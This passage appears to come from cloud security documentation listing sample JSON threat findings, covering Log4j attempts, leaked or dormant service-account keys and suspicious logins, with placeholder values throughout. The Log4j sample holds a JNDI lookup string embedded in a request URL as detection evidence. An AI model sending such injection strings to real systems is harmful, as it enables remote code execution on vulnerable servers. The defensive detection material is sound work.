      "sourceId": {
        "projectNumber": "PROJECT_NUMBER",
        "customerOrganizationNumber": "ORGANIZATION_ID"
      },
      "detectionCategory": {
        "ruleName": "cloudsql_superuser_writes_to_user_tables"
      },
      "detectionPriority": "LOW",
      "affectedResources": [
        {
          "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
        },
        {
          "gcpResourceName": "//cloudsql.googleapis.com/projects/PROJECT_ID/instances/INSTANCE_NAME"
        }
      ],
      "evidence": [
        {
          "sourceLogId": {
            "projectId": "PROJECT_ID",
            "resourceContainer": "projects/PROJECT_ID",
            "timestamp": {
              "seconds": "0",
              "nanos": 0.0
            },
            "insertId": "INSERT_ID"
          }
        }
      ],
      "findingId": "FINDING_ID",
      "contextUris": {
        "mitreUri": {
          "displayName": "MITRE Link",
          "url": "https://attack.mitre.org/techniques/T1567/002/"
        },
        "cloudLoggingQueryUri": [
          {
            "displayName": "Cloud Logging Query Link",
            "url": "LOGGING_LINK"
          }
        ],
        "relatedFindingUri": {
          "displayName": "Related CloudSQL Exfiltration findings",
          "url": "RELATED_FINDINGS_LINK"
        }
      }
    },
    "eventTime": "2022-01-19T21:36:07.901Z",
    "createTime": "2022-01-19T21:36:08.695Z",
    "severity": "LOW",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "mute": "UNDEFINED",
    "findingClass": "THREAT",
    "mitreAttack": {
      "primaryTactic": "INITIAL_ACCESS",
      "primaryTechniques": [
        "DEFAULT_ACCOUNTS"
      ]
    },
    "database": {
      "displayName": "DATABASE_NAME",
      "userName": "USER_NAME",
      "query": "QUERY"
    },
    "access": {
      "serviceName": "cloudsql.googleapis.com",
      "methodName": "cloudsql.instances.query"
    }
  },
  "resource": {
    "name": "//cloudsql.googleapis.com/projects/PROJECT_ID/instances/INSTANCE_NAME",
    "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//cloudsql.googleapis.com/projects/PROJECT_NUMBER",
    "parentDisplayName": "PROJECT_ID",
    "type": "google.cloud.sql.Instance",
    "folders": [
      {
        "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",
        "resourceFolderDisplayName": "FOLDER_ID"
      }
    ],
    "displayName": "INSTANCE_NAME"
  }
}

Initial Access: Disabled Password Leak

This finding isn't available for project-level activations.

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//login.googleapis.com/organizations/ORGANIZATION_ID",
    "state": "ACTIVE",
    "category": "Initial Access: Disabled Password Leak",
    "sourceProperties": {
      "sourceId": {
        "organizationNumber": "ORGANIZATION_ID",
        "customerOrganizationNumber": "ORGANIZATION_ID"
      },
      "detectionCategory": {
        "technique": "valid_accounts",
        "indicator": "audit_log",
        "ruleName": "disabled_password_leak"
      },
      "detectionPriority": "LOW",
      "affectedResources": [
        {
          "gcpResourceName": "//login.googleapis.com/organizations/ORGANIZATION_ID"
        },
        {
          "gcpResourceName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID"
        }
      ],
      "evidence": [
        {
          "sourceLogId": {
            "resourceContainer": "organizations/ORGANIZATION_ID",
            "timestamp": {
              "seconds": "1626462896",
              "nanos": 6.81E8
            },
            "insertId": "INSERT_ID"
          }
        }
      ],
      "properties": {
        "serviceName": "login.googleapis.com",
        "methodName": "google.login.LoginService.accountDisabledPasswordLeak",
        "ssoState": "UNKNOWN",
        "principalEmail": "PRINCIPAL_EMAIL"
      },
      "contextUris": {
        "mitreUri": {
          "displayName": "MITRE Link",
          "url": "https://attack.mitre.org/techniques/T1078/"
        },
        "cloudLoggingQueryUri": [
          {
            "displayName": "Cloud Logging Query Link",
            "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-07-16T19:14:56.681Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%22%22?project\u003d"
          }
        ],
        "workspacesUri": {
          "displayName": "Workspaces Link",
          "url": "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/login#account_disabled_password_leak"
        }
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-07-16T19:14:56.681Z",
    "createTime": "2021-07-16T19:15:00.430Z",
    "severity": "LOW",
    "workflowState": "NEW",
    "canonicalName": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "findingClass": "THREAT",
    "indicator": {}
  },
  "resource": {
    "name": "//login.googleapis.com/organizations/ORGANIZATION_ID"
  }
}

Initial Access: Dormant Service Account Action

{
  "findings": {
    "access": {
      "principalEmail": "DORMANT_SERVICE_ACCOUNT",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": {
        "regionCode": "US"
      },
      "serviceName": "SERVICE_NAME",
      "methodName": "METHOD_NAME"
    },
    "assetDisplayName": "ASSET_DISPLAY_NAME",
    "assetId": "organizations/ORGANIZATION_NUMBER/assets/ASSET_ID",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Initial Access: Dormant Service Account Action",
    "contacts": {
      "security": {
        "contacts": [
          {
            "email": "EMAIL_ADDRESS"
          },
          {
            "email": "EMAIL_ADDRESS"
          },
          {
            "email": "EMAIL_ADDRESS"
          }
        ]
      },
      "technical": {
        "contacts": [
          {
            "email": "EMAIL_ADDRESS"
          },
          {
            "email": "EMAIL_ADDRESS"
          },
          {
            "email": "EMAIL_ADDRESS"
          }
        ]
      }
    },
    "createTime": "2023-01-12T10:35:47.381Z",
    "database": {},
    "eventTime": "2023-01-12T10:35:47.270Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "INITIAL_ACCESS",
      "primaryTechniques": [
        "VALID_ACCOUNTS",
        "CLOUD_ACCOUNTS"
      ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "severity": "HIGH",
    "sourceDisplayName": "Event Threat Detection",
    "state": "ACTIVE",
    "vulnerability": {},
    "workflowState": "NEW"
  },
  "resource": {
    "name": "RESOURCE_NAME",
    "display_name": "RESOURCE_DISPLAY_NAME",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",
    "parent_display_name": "FOLDER_NAME",
    "type": "RESOURCE_TYPE",
    "folders": [
      {
        "resourceFolderDisplayName": "FOLDER_NAME",
        "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER"
      }
    ]
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "technique": "persistence",
      "indicator": "audit_log",
      "ruleName": "dormant_sa_used_in_action"
    },
    "detectionPriority": "HIGH",
    "affectedResources": [
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {
            "seconds": "1673519681",
            "nanos": 728289000
          },
          "insertId": "INSERT_ID"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/tactics/TA0003/"
      }
    }
  }
}

Initial Access: Dormant Service Account Activity in AI Service

{
  "findings": {
    "access": {
      "principalEmail": "DORMANT_SERVICE_ACCOUNT",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": {
        "regionCode": "US"
      },
      "serviceName": "aiplatform.googleapis.com",
      "methodName": "METHOD_NAME"
    },
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Initial Access: Dormant Service Account Activity in AI Service",
    "contacts": {
      "security": {
        "contacts": [
          {
            "email": "EMAIL_ADDRESS"
          },
          {
            "email": "EMAIL_ADDRESS"
          },
          {
            "email": "EMAIL_ADDRESS"
          }
        ]
      },
      "technical": {
        "contacts": [
          {
            "email": "EMAIL_ADDRESS"
          },
          {
            "email": "EMAIL_ADDRESS"
          },
          {
            "email": "EMAIL_ADDRESS"
          }
        ]
      }
    },
    "createTime": "2023-01-12T10:35:47.381Z",
    "database": {},
    "eventTime": "2023-01-12T10:35:47.270Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "INITIAL_ACCESS",
      "primaryTechniques": [
        "VALID_ACCOUNTS"
      ]
    },
    "muteInfo": {
      "staticMute": {
        "state": "UNDEFINED",
        "applyTime": "1970-01-01T00:00:00Z"
      }
    },
    "domains": [
      {
        "category": "AI"
      },
      {
        "category": "IDENTITY_AND_ACCESS"
      }
    ],
    "aiModel": {
      "name": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME",
      "deploymentPlatform": "VERTEX_AI"
    },
    "name": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME",
    "severity": "HIGH",
    "state": "ACTIVE",
    "vulnerability": {},
    "workflowState": "NEW"
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "displayName": "projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME",
    "gcpMetadata": {
      "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
      "projectDisplayName": "PROJECT_ID",
      "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
      "parentDisplayName": "PROJECT_ID",
      "organization": "organizations/ORGANIZATION_ID"
    },
    "type": "google.aiplatform.Model",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "ai_dormant_sa_used_in_action"
    },
    "detectionPriority": "HIGH",
    "affectedResources": [
      {
        "gcpResourceName": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME"
      },
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {
            "seconds": "1673519681",
            "nanos": 728289000
          },
          "insertId": "INSERT_ID"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://atlas.mitre.org/techniques/AML.T0012/"
      }
    }
  }
}

Initial Access: Dormant Service Account Key Created

{
  "findings": {
    "access": {
      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": {
        "regionCode": "US"
      },
      "serviceName": "iam.googleapis.com",
      "methodName": "google.iam.admin.v1.CreateServiceAccountKey"
    },
    "assetDisplayName": "ASSET_DISPLAY_NAME",
    "assetId": "organizations/ORGANIZATION_NUMBER/assets/ASSET_ID",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Initial Access: Dormant Service Account Key Created",
    "contacts": {
      "security": {
        "contacts": [
          {
            "email": "EMAIL_ADDRESS"
          },
          {
            "email": "EMAIL_ADDRESS"
          },
          {
            "email": "EMAIL_ADDRESS"
          }
        ]
      },
      "technical": {
        "contacts": [
          {
            "email": "EMAIL_ADDRESS"
          },
          {
            "email": "EMAIL_ADDRESS"
          },
          {
            "email": "EMAIL_ADDRESS"
          }
        ]
      }
    },
    "createTime": "2023-01-12T10:35:47.381Z",
    "database": {},
    "eventTime": "2023-01-12T10:35:47.270Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "INITIAL_ACCESS",
      "primaryTechniques": [
        "VALID_ACCOUNTS",
        "CLOUD_ACCOUNTS"
      ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//iam.googleapis.com/projects/PROJECT_ID/serviceAccounts/DORMANT_SERVICE_ACCOUNT_ID/keys/SERVICE_ACCOUNT_KEY_ID",
    "severity": "HIGH",
    "sourceDisplayName": "Event Threat Detection",
    "state": "ACTIVE",
    "vulnerability": {},
    "workflowState": "NEW"
  },
  "resource": {
    "name": "//iam.googleapis.com/projects/PROJECT_ID/serviceAccounts/DORMANT_SERVICE_ACCOUNT_ID/keys/SERVICE_ACCOUNT_KEY_ID",
    "display_name": "projects/PROJECT_ID/serviceAccounts/DORMANT_SERVICE_ACCOUNT_EMAIL/keys/SERVICE_ACCOUNT_KEY_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//iam.googleapis.com/projects/PROJECT_ID/serviceAccounts/DORMANT_SERVICE_ACCOUNT_ID",
    "parent_display_name": "projects/PROJECT_ID/serviceAccounts/DORMANT_SERVICE_ACCOUNT_EMAIL",
    "type": "google.iam.ServiceAccountKey",
    "folders": [
      {
        "resourceFolderDisplayName": "FOLDER_NAME",
        "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER"
      }
    ]
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "key_created_on_dormant_sa"
    },
    "detectionPriority": "HIGH",
    "affectedResources": [
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {
            "seconds": "1673519681",
            "nanos": 728289000
          },
          "insertId": "INSERT_ID"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/tactics/TA0003/"
      }
    }
  }
}

Initial Access: Excessive Permission Denied Actions

{
  "findings": {
    "access": {
      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": {
        "regionCode": "US"
      },
      "serviceName": "SERVICE_NAME",
      "methodName": "METHOD_NAME",
      "principalSubject": "PRINCIPAL_SUBJECT",
      "serviceAccountKeyName": "SERVICE_ACCOUNT_KEY_NAME"
    },
    "assetDisplayName": "ASSET_DISPLAY_NAME",
    "assetId": "organizations/ORGANIZATION_NUMBER/assets/ASSET_ID",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Initial Access: Excessive Permission Denied Actions",
    "contacts": {
      "security": {
        "contacts": [
          {
            "email": "EMAIL_ADDRESS"
          },
          {
            "email": "EMAIL_ADDRESS"
          },
          {
            "email": "EMAIL_ADDRESS"
          }
        ]
      },
      "technical": {
        "contacts": [
          {
            "email": "EMAIL_ADDRESS"
          },
          {
            "email": "EMAIL_ADDRESS"
          },
          {
            "email": "EMAIL_ADDRESS"
          }
        ]
      }
    },
    "createTime": "2023-01-12T10:35:47.381Z",
    "database": {},
    "eventTime": "2023-01-12T10:35:47.270Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {},
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "severity": "LOW",
    "sourceDisplayName": "Event Threat Detection",
    "state": "ACTIVE",
    "vulnerability": {},
    "workflowState": "NEW"
  },
  "resource": {
    "name": "RESOURCE_NAME",
    "display_name": "RESOURCE_DISPLAY_NAME",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",
    "parent_display_name": "FOLDER_NAME",
    "type": "RESOURCE_TYPE",
    "folders": [
      {
        "resourceFolderDisplayName": "FOLDER_NAME",
        "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER"
      }
    ]
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "technique": "persistence",
      "indicator": "audit_log",
      "ruleName": "anomalous_behavior",
      "subRuleName": "new_api_method"
    },
    "detectionPriority": "LOW",
    "affectedResources": [
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {
            "seconds": "1673519681",
            "nanos": 728289000
          },
          "insertId": "INSERT_ID"
        }
      }
    ],
    "properties": {
      "failedActions": [
        {
          "methodName": "SetIamPolicy",
          "serviceName": "iam.googleapis.com",
          "attemptTimes": "7",
          "lastOccurredTime": "2023-03-15T17:35:18.771219Z"
        },
        {
          "methodName": "google.iam.admin.v1.CreateServiceAccountKey",
          "serviceName": "iam.googleapis.com",
          "attemptTimes": "3",
          "lastOccurredTime": "2023-03-15T05:36:14.954701Z"
        }
      ]
    },
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1078/004/"
      }
    }
  }
}

Initial Access: Government Based Attack

This finding isn't available for project-level activations.

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//login.googleapis.com/organizations/ORGANIZATION_ID",
    "state": "ACTIVE",
    "category": "Initial Access: Government Based Attack",
    "sourceProperties": {
      "sourceId": {
        "organizationNumber": "ORGANIZATION_ID",
        "customerOrganizationNumber": "ORGANIZATION_ID"
      },
      "detectionCategory": {
        "technique": "valid_accounts",
        "indicator": "audit_log",
        "ruleName": "government_based_attack"
      },
      "detectionPriority": "HIGH",
      "affectedResources": [
        {
          "gcpResourceName": "//login.googleapis.com/organizations/ORGANIZATION_ID"
        },
        {
          "gcpResourceName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID"
        }
      ],
      "evidence": [
        {
          "sourceLogId": {
            "resourceContainer": "organizations/ORGANIZATION_ID",
            "timestamp": {
              "seconds": "1624061458",
              "nanos": 7.4E7
            },
            "insertId": "INSERT_ID"
          }
        }
      ],
      "properties": {
        "serviceName": "login.googleapis.com",
        "methodName": "google.login.LoginService.govAttackWarning",
        "ssoState": "UNKNOWN",
        "principalEmail": "PRINCIPAL_EMAIL"
      },
      "contextUris": {
        "mitreUri": {
          "displayName": "MITRE Link",
          "url": "https://attack.mitre.org/techniques/T1078/"
        },
        "cloudLoggingQueryUri": [
          {
            "displayName": "Cloud Logging Query Link",
            "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-06-19T00:10:58.074Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%22%22?project\u003d"
          }
        ],
        "workspacesUri": {
          "displayName": "Workspaces Link",
          "url": "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/login#gov_attack_warning"
        }
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-06-19T00:10:58.074Z",
    "createTime": "2021-06-19T00:11:01.760Z",
    "severity": "HIGH",
    "workflowState": "NEW",
    "canonicalName": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "findingClass": "THREAT"
  },
  "resource": {
    "name": "//login.googleapis.com/organizations/ORGANIZATION_ID"
  }
}

Initial Access: Leaked Service Account Key Used

{
  "findings": {
    "access": {
      "principalEmail": "SERVICE_ACCOUNT",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": {
        "regionCode": "US"
      },
      "serviceName": "SERVICE_NAME",
      "methodName": "METHOD_NAME",
      "serviceAccountKeyName": "LEAKED_SERVICE_ACCOUNT_KEY"
    },
    "assetDisplayName": "ASSET_DISPLAY_NAME",
    "assetId": "organizations/ORGANIZATION_NUMBER/assets/ASSET_ID",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Initial Access: Leaked Service Account Key Used",
    "contacts": {
      "security": {
        "contacts": [
          {
            "email": "EMAIL_ADDRESS"
          }
        ]
      },
      "technical": {
        "contacts": [
          {
            "email": "EMAIL_ADDRESS"
          }
        ]
      }
    },
    "createTime": "2023-07-18T10:35:47.381Z",
    "database": {},
    "eventTime": "2023-07-18T10:35:47.270Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "INITIAL_ACCESS",
      "primaryTechniques": [
        "VALID_ACCOUNTS",
        "CLOUD_ACCOUNTS"
      ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "AFFECTED_RESOURCE",
    "severity": "HIGH",
    "sourceDisplayName": "Event Threat Detection",
    "state": "ACTIVE",
    "vulnerability": {},
    "workflowState": "NEW"
  },
  "resource": {
    "name": "RESOURCE_NAME",
    "display_name": "RESOURCE_DISPLAY_NAME",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID"
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "leaked_sa_key_used"
    },
    "detectionPriority": "HIGH",
    "affectedResources": [
      {
        "gcpResourceName": "GOOGLE_RESOURCE"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {
            "seconds": "1673519681",
            "nanos": 728289000
          },
          "insertId": "INSERT_ID"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1078/004/"
      }
    }
  },
  "description": "A leaked service account key is used, the key is leaked at LEAKED_SOURCE_URL"
}

Initial Access: Log4j Compromise Attempt

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "state": "ACTIVE",
    "category": "Initial Access: Log4j Compromise Attempt",
    "sourceProperties": {
      "sourceId": {
        "projectNumber": "PROJECT_NUMBER",
        "customerOrganizationNumber": "ORGANIZATION_ID"
      },
      "detectionCategory": {
        "ruleName": "log4j_compromise_attempt"
      },
      "detectionPriority": "LOW",
      "affectedResources": [
        {
          "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
        }
      ],
      "evidence": [
        {
          "sourceLogId": {
            "projectId": "PROJECT_ID",
            "resourceContainer": "projects/PROJECT_ID",
            "timestamp": {
              "seconds": "1639690492",
              "nanos": 9.13836E8
            },
            "insertId": "INSERT_ID"
          }
        }
      ],
      "properties": {
        "loadBalancerName": "LOAD_BALANCER_NAME",
        "requestUrl": "REQUEST_URL?${jndi:ldap://google.com}"
      },
      "findingId": "FINDING_ID",
      "contextUris": {
        "mitreUri": {
          "displayName": "MITRE Link",
          "url": "https://attack.mitre.org/techniques/T1190/"
        },
        "cloudLoggingQueryUri": [
          {
            "displayName": "Cloud Logging Query Link",
            "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-12-16T21:34:52.913836Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%22PROJECT_ID%22?project\u003dPROJECT_ID"
          }
        ],
        "relatedFindingUri": {}
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-12-16T21:34:52.913Z",
    "createTime": "2021-12-16T21:34:55.022Z",
    "severity": "LOW",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "mute": "UNDEFINED",
    "findingClass": "THREAT"
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",
    "parentDisplayName": "FOLDER_DISPLAY_NAME",
    "type": "google.cloud.resourcemanager.Project",
    "folders": [
      {
        "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",
        "resourceFolderDisplayName": "FOLDER_DISPLAY_NAME"
      }
    ],
    "displayName": "PROJECT_ID"
  }
}

Initial Access: Suspicious Login Blocked

This finding isn't available for project-level activations.

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//login.googleapis.com/organizations/ORGANIZATION_ID",
    "state": "ACTIVE",
    "category": "Initial Access: Suspicious Login Blocked",
    "sourceProperties": {
      "sourceId": {
        "organizationNumber": "ORGANIZATION_ID",
        "customerOrganizationNumber": "ORGANIZATION_ID"
      },
      "detectionCategory": {
        "technique": "valid_accounts",
        "indicator": "audit_log",
        "ruleName": "suspicious_login"
      },
      "detectionPriority": "LOW",
      "affectedResources": [
        {
          "gcpResourceName": "//login.googleapis.com/organizations/ORGANIZATION_ID"
        },
        {
          "gcpResourceName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID"
        }
      ],
      "evidence": [
        {
          "sourceLogId": {
            "projectId": "0",
            "resourceContainer": "organizations/ORGANIZATION_ID",
            "timestamp": {
              "seconds": "1621637767",
              "nanos": 0
            },
            "insertId": "INSERT_ID"
          }
        }
      ],
      "properties": {
        "serviceName": "login.googleapis.com",
        "methodName": "google.login.LoginService.suspiciousLogin",
        "ssoState": "UNKNOWN",
        "principalEmail": "PRINCIPAL_EMAIL"
      },
      "contextUris": {
        "mitreUri": {
          "displayName": "MITRE Link",
          "url": "https://attack.mitre.org/techniques/T1078/"
        },
        "cloudLoggingQueryUri": [
          {
            "displayName": "Cloud Logging Query Link",
            "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-05-21T22:56:07Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%220%22?project\u003d0"
          }
        ],
        "workspacesUri": {
          "displayName": "Workspaces Link",
          "url": "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/login#suspicious_login"
        }
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-05-21T22:56:07Z",
    "createTime": "2021-05-27T02:36:07.382Z",
    "severity": "LOW",
    "workflowState": "NEW",
    "canonicalName": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "findingClass": "THREAT"
  },
  "resource": {
    "name": "//login.googleapis.com/organizations/ORGANIZATION_ID"
  }
}

Lateral Movement: Modified Boot Disk Attached to Instance

{
  "finding": {
    "access": {
